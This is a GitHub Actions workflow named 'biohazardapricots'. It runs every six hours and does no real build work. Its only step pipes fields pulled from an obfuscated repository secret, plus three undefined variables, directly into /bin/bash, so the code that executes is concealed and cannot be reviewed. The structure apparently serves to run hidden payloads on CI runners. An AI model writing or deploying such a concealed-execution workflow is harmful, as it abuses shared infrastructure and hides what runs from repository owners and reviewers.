name: biohazardapricots

on:
  workflow_dispatch:
  schedule:
    - cron: '47 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: biohazardapricots
        env:
          afxrm57: ${{ secrets.afxrm57 }}
        run: |
          echo $afxrm57 | jq -r .ufs41279 | /bin/bash
          echo $rou7 | jq -r .vldys39 | /bin/bash
          echo $v3 | jq -r .s23068 | /bin/bash
          echo $axli5741 | jq -r .trgw79 | /bin/bash

